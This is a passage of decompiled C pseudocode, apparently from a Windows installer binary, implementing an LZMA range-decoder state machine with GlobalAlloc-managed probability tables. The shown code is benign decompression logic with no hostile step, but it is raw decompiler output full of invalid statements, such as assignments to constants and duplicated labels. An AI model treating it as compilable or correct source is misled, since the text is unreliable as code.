              									goto L139;
              								}
              								L137:
              								if( *(_t613 - 0x6c) == 0) {
              									 *(_t613 - 0x88) = 5;
              									L170:
              									_t568 = 0x22;
              									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
              									_t535 = 0;
              									L172:
              									return _t535;
              								}
              								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
              								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              								L139:
              								_t533 =  *(_t613 - 0x84);
              								while(1) {
              									 *(_t613 - 0x88) = _t533;
              									while(1) {
              										L1:
              										_t534 =  *(_t613 - 0x88);
              										if(_t534 > 0x1c) {
              											break;
              										}
              										switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              											case 0:
              												if( *(_t613 - 0x6c) == 0) {
              													goto L170;
              												}
              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              												_t534 =  *( *(_t613 - 0x70));
              												if(_t534 > 0xe1) {
              													goto L171;
              												}
              												_t538 = _t534 & 0x000000ff;
              												_push(0x2d);
              												asm("cdq");
              												_pop(_t570);
              												_push(9);
              												_pop(_t571);
              												_t609 = _t538 / _t570;
              												_t540 = _t538 % _t570 & 0x000000ff;
              												asm("cdq");
              												_t604 = _t540 % _t571 & 0x000000ff;
              												 *(_t613 - 0x3c) = _t604;
              												 *(_t613 - 0x1c) = (1 << _t609) - 1;
              												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
              												_t612 = (0x300 << _t604 + _t609) + 0x736;
              												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
              													L10:
              													if(_t612 == 0) {
              														L12:
              														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
              														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              														goto L15;
              													} else {
              														goto L11;
              													}
              													do {
              														L11:
              														_t612 = _t612 - 1;
              														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
              													} while (_t612 != 0);
              													goto L12;
              												}
              												if( *(_t613 - 4) != 0) {
              													GlobalFree( *(_t613 - 4));
              												}
              												_t534 = GlobalAlloc(0x40, 0x600); // executed
              												 *(_t613 - 4) = _t534;
              												if(_t534 == 0) {
              													goto L171;
              												} else {
              													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
              													goto L10;
              												}
              											case 1:
              												L13:
              												__eflags =  *(_t613 - 0x6c);
              												if( *(_t613 - 0x6c) == 0) {
              													 *(_t613 - 0x88) = 1;
              													goto L170;
              												}
              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              												_t45 = _t613 - 0x48;
              												 *_t45 =  *(_t613 - 0x48) + 1;
              												__eflags =  *_t45;
              												L15:
              												if( *(_t613 - 0x48) < 4) {
              													goto L13;
              												}
              												_t546 =  *(_t613 - 0x40);
              												if(_t546 ==  *(_t613 - 0x74)) {
              													L20:
              													 *(_t613 - 0x48) = 5;
              													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
              													goto L23;
              												}
              												 *(_t613 - 0x74) = _t546;
              												if( *(_t613 - 8) != 0) {
              													GlobalFree( *(_t613 - 8));
              												}
              												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
              												 *(_t613 - 8) = _t534;
              												if(_t534 == 0) {
              													goto L171;
              												} else {
              													goto L20;
              												}
              											case 2:
              												L24:
              												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
              												 *(_t613 - 0x84) = 6;
              												 *(_t613 - 0x4c) = _t553;
              												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
              												L132:
              												 *(_t613 - 0x54) = _t606;
              												goto L133;
              											case 3:
              												L21:
              												__eflags =  *(_t613 - 0x6c);
              												if( *(_t613 - 0x6c) == 0) {
              													 *(_t613 - 0x88) = 3;
              													goto L170;
              												}
              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              												_t67 = _t613 - 0x70;
              												 *_t67 =  &(( *(_t613 - 0x70))[1]);
              												__eflags =  *_t67;
              												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              												L23:
              												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
              												if( *(_t613 - 0x48) != 0) {
              													goto L21;
              												}
              												goto L24;
              											case 4:
              												L133:
              												_t531 =  *_t606;
              												_t589 = _t531 & 0x0000ffff;
              												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              												if( *(_t613 - 0xc) >= _t565) {
              													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              													 *(_t613 - 0x40) = 1;
              													_t532 = _t531 - (_t531 >> 5);
              													 *_t606 = _t532;
              												} else {
              													 *(_t613 - 0x10) = _t565;
              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              													 *_t606 = (0x800 - _t589 >> 5) + _t531;
              												}
              												if( *(_t613 - 0x10) >= 0x1000000) {
              													goto L139;
              												}
              											case 5:
              												goto L137;
              											case 6:
              												__edx = 0;
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x34) = 1;
              													 *(__ebp - 0x84) = 7;
              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              													while(1) {
              														L132:
              														 *(_t613 - 0x54) = _t606;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
              												__esi =  *(__ebp - 0x60);
              												__cl = 8;
              												__cl = 8 -  *(__ebp - 0x3c);
              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              												__ecx =  *(__ebp - 0x3c);
              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              												__ecx =  *(__ebp - 4);
              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              												__eflags =  *(__ebp - 0x38) - 4;
              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												if( *(__ebp - 0x38) >= 4) {
              													__eflags =  *(__ebp - 0x38) - 0xa;
              													if( *(__ebp - 0x38) >= 0xa) {
              														_t98 = __ebp - 0x38;
              														 *_t98 =  *(__ebp - 0x38) - 6;
              														__eflags =  *_t98;
              													} else {
              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              													}
              												} else {
              													 *(__ebp - 0x38) = 0;
              												}
              												__eflags =  *(__ebp - 0x34) - __edx;
              												if( *(__ebp - 0x34) == __edx) {
              													__ebx = 0;
              													__ebx = 1;
              													goto L61;
              												} else {
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__ecx =  *(__ebp - 8);
              													__ebx = 0;
              													__ebx = 1;
              													__al =  *((intOrPtr*)(__eax + __ecx));
              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              													goto L41;
              												}
              											case 7:
              												__eflags =  *(__ebp - 0x40) - 1;
              												if( *(__ebp - 0x40) != 1) {
              													__eax =  *(__ebp - 0x24);
              													 *(__ebp - 0x80) = 0x16;
              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
              													__eax =  *(__ebp - 0x28);
              													 *(__ebp - 0x24) =  *(__ebp - 0x28);
              													__eax =  *(__ebp - 0x2c);
              													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              													__eax = 0;
              													__eflags =  *(__ebp - 0x38) - 7;
              													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              													__al = __al & 0x000000fd;
              													__eax = (__eflags >= 0) - 1 + 0xa;
              													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x664;
              													__eflags = __eax;
              													 *(__ebp - 0x58) = __eax;
              													goto L69;
              												}
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 8;
              												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              												while(1) {
              													L132:
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											case 8:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x84) = 0xa;
              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              												} else {
              													__eax =  *(__ebp - 0x38);
              													__ecx =  *(__ebp - 4);
              													__eax =  *(__ebp - 0x38) + 0xf;
              													 *(__ebp - 0x84) = 9;
              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              												}
              												while(1) {
              													L132:
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											case 9:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													goto L89;
              												}
              												__eflags =  *(__ebp - 0x60);
              												if( *(__ebp - 0x60) == 0) {
              													goto L171;
              												}
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												_t259 =  *(__ebp - 0x38) - 7 >= 0;
              												__eflags = _t259;
              												0 | _t259 = _t259 + _t259 + 9;
              												 *(__ebp - 0x38) = _t259 + _t259 + 9;
              												goto L76;
              											case 0xa:
              												goto L0;
              											case 0xb:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__ecx =  *(__ebp - 0x24);
              													__eax =  *(__ebp - 0x20);
              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												} else {
              													__eax =  *(__ebp - 0x24);
              												}
              												__ecx =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												goto L88;
              											case 0xc:
              												L99:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xc;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t334 = __ebp - 0x70;
              												 *_t334 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t334;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												__eax =  *(__ebp - 0x2c);
              												goto L101;
              											case 0xd:
              												L37:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xd;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t122 = __ebp - 0x70;
              												 *_t122 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t122;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L39:
              												__eax =  *(__ebp - 0x40);
              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              													goto L48;
              												}
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													goto L54;
              												}
              												L41:
              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              												__ecx =  *(__ebp - 0x58);
              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              												 *(__ebp - 0x48) = __eax;
              												__eax = __eax + 1;
              												__eax = __eax << 8;
              												__eax = __eax + __ebx;
              												__esi =  *(__ebp - 0x58) + __eax * 2;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edx = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													 *(__ebp - 0x40) = 1;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													__ebx = __ebx + __ebx + 1;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edx;
              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L39;
              												} else {
              													goto L37;
              												}
              											case 0xe:
              												L46:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xe;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t156 = __ebp - 0x70;
              												 *_t156 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t156;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												while(1) {
              													L48:
              													__eflags = __ebx - 0x100;
              													if(__ebx >= 0x100) {
              														break;
              													}
              													__eax =  *(__ebp - 0x58);
              													__edx = __ebx + __ebx;
              													__ecx =  *(__ebp - 0x10);
              													__esi = __edx + __eax;
              													__ecx =  *(__ebp - 0x10) >> 0xb;
              													__ax =  *__esi;
              													 *(__ebp - 0x54) = __esi;
              													__edi = __ax & 0x0000ffff;
              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              													__eflags =  *(__ebp - 0xc) - __ecx;
              													if( *(__ebp - 0xc) >= __ecx) {
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              														__cx = __ax;
              														_t170 = __edx + 1; // 0x1
              														__ebx = _t170;
              														__cx = __ax >> 5;
              														__eflags = __eax;
              														 *__esi = __ax;
              													} else {
              														 *(__ebp - 0x10) = __ecx;
              														0x800 = 0x800 - __edi;
              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              														__ebx = __ebx + __ebx;
              														 *__esi = __cx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														continue;
              													} else {
              														goto L46;
              													}
              												}
              												L54:
              												_t173 = __ebp - 0x34;
              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              												__eflags =  *_t173;
              												goto L55;
              											case 0xf:
              												L58:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xf;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t203 = __ebp - 0x70;
              												 *_t203 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t203;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L60:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													L55:
              													__al =  *(__ebp - 0x44);
              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              													goto L56;
              												}
              												L61:
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t217 = __edx + 1; // 0x1
              													__ebx = _t217;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L60;
              												} else {
              													goto L58;
              												}
              											case 0x10:
              												L109:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x10;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t365 = __ebp - 0x70;
              												 *_t365 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t365;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												goto L111;
              											case 0x11:
              												goto L69;
              											case 0x12:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 0x58);
              													 *(__ebp - 0x84) = 0x13;
              													__esi =  *(__ebp - 0x58) + 2;
              													while(1) {
              														L132:
              														 *(_t613 - 0x54) = _t606;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x4c);
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												__eflags = __eax;
              												__eax =  *(__ebp - 0x58) + __eax + 4;
              												goto L130;
              											case 0x13:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													_t469 = __ebp - 0x58;
              													 *_t469 =  *(__ebp - 0x58) + 0x204;
              													__eflags =  *_t469;
              													 *(__ebp - 0x30) = 0x10;
              													 *(__ebp - 0x40) = 8;
              													L144:
              													 *(__ebp - 0x7c) = 0x14;
              													goto L145;
              												}
              												__eax =  *(__ebp - 0x4c);
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												 *(__ebp - 0x30) = 8;
              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              												L130:
              												 *(__ebp - 0x58) = __eax;
              												 *(__ebp - 0x40) = 3;
              												goto L144;
              											case 0x14:
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              												__eax =  *(__ebp - 0x80);
              												 *(_t613 - 0x88) = _t533;
              												goto L1;
              											case 0x15:
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xb;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              												goto L120;
              											case 0x16:
              												__eax =  *(__ebp - 0x30);
              												__eflags = __eax - 4;
              												if(__eax >= 4) {
              													_push(3);
              													_pop(__eax);
              												}
              												__ecx =  *(__ebp - 4);
              												 *(__ebp - 0x40) = 6;
              												__eax = __eax << 7;
              												 *(__ebp - 0x7c) = 0x19;
              												 *(__ebp - 0x58) = __eax;
              												goto L145;
              											case 0x17:
              												L145:
              												__eax =  *(__ebp - 0x40);
              												 *(__ebp - 0x50) = 1;
              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
              												goto L149;
              											case 0x18:
              												L146:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x18;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t484 = __ebp - 0x70;
              												 *_t484 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t484;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L148:
              												_t487 = __ebp - 0x48;
              												 *_t487 =  *(__ebp - 0x48) - 1;
              												__eflags =  *_t487;
              												L149:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__ecx =  *(__ebp - 0x40);
              													__ebx =  *(__ebp - 0x50);
              													0 = 1;
              													__eax = 1 << __cl;
              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
              													__eax =  *(__ebp - 0x7c);
              													 *(__ebp - 0x44) = __ebx;
              													while(1) {
              														 *(_t613 - 0x88) = _t533;
              														goto L1;
              													}
              												}
              												__eax =  *(__ebp - 0x50);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              												__eax =  *(__ebp - 0x58);
              												__esi = __edx + __eax;
              												 *(__ebp - 0x54) = __esi;
              												__ax =  *__esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													__cx = __ax >> 5;
              													__eax = __eax - __ecx;
              													__edx = __edx + 1;
              													__eflags = __edx;
              													 *__esi = __ax;
              													 *(__ebp - 0x50) = __edx;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L148;
              												} else {
              													goto L146;
              												}
              											case 0x19:
              												__eflags = __ebx - 4;
              												if(__ebx < 4) {
              													 *(__ebp - 0x2c) = __ebx;
              													L119:
              													_t393 = __ebp - 0x2c;
              													 *_t393 =  *(__ebp - 0x2c) + 1;
              													__eflags =  *_t393;
              													L120:
              													__eax =  *(__ebp - 0x2c);
              													__eflags = __eax;
              													if(__eax == 0) {
              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              														goto L170;
              													}
              													__eflags = __eax -  *(__ebp - 0x60);
              													if(__eax >  *(__ebp - 0x60)) {
              														goto L171;
              													}
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              													__eax =  *(__ebp - 0x30);
              													_t400 = __ebp - 0x60;
              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              													__eflags =  *_t400;
              													goto L123;
              												}
              												__ecx = __ebx;
              												__eax = __ebx;
              												__ecx = __ebx >> 1;
              												__eax = __ebx & 0x00000001;
              												__ecx = (__ebx >> 1) - 1;
              												__al = __al | 0x00000002;
              												__eax = (__ebx & 0x00000001) << __cl;
              												__eflags = __ebx - 0xe;
              												 *(__ebp - 0x2c) = __eax;
              												if(__ebx >= 0xe) {
              													__ebx = 0;
              													 *(__ebp - 0x48) = __ecx;
              													L102:
              													__eflags =  *(__ebp - 0x48);
              													if( *(__ebp - 0x48) <= 0) {
              														__eax = __eax + __ebx;
              														 *(__ebp - 0x40) = 4;
              														 *(__ebp - 0x2c) = __eax;
              														__eax =  *(__ebp - 4);
              														__eax =  *(__ebp - 4) + 0x644;
              														__eflags = __eax;
              														L108:
              														__ebx = 0;
              														 *(__ebp - 0x58) = __eax;
              														 *(__ebp - 0x50) = 1;
              														 *(__ebp - 0x44) = 0;
              														 *(__ebp - 0x48) = 0;
              														L112:
              														__eax =  *(__ebp - 0x40);
              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              															_t391 = __ebp - 0x2c;
              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
              															__eflags =  *_t391;
              															goto L119;
              														}
              														__eax =  *(__ebp - 0x50);
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              														__eax =  *(__ebp - 0x58);
              														__esi = __edi + __eax;
              														 *(__ebp - 0x54) = __esi;
              														__ax =  *__esi;
              														__ecx = __ax & 0x0000ffff;
              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              														__eflags =  *(__ebp - 0xc) - __edx;
              														if( *(__ebp - 0xc) >= __edx) {
              															__ecx = 0;
              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              															__ecx = 1;
              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              															__ebx = 1;
              															__ecx =  *(__ebp - 0x48);
              															__ebx = 1 << __cl;
              															__ecx = 1 << __cl;
              															__ebx =  *(__ebp - 0x44);
              															__ebx =  *(__ebp - 0x44) | __ecx;
              															__cx = __ax;
              															__cx = __ax >> 5;
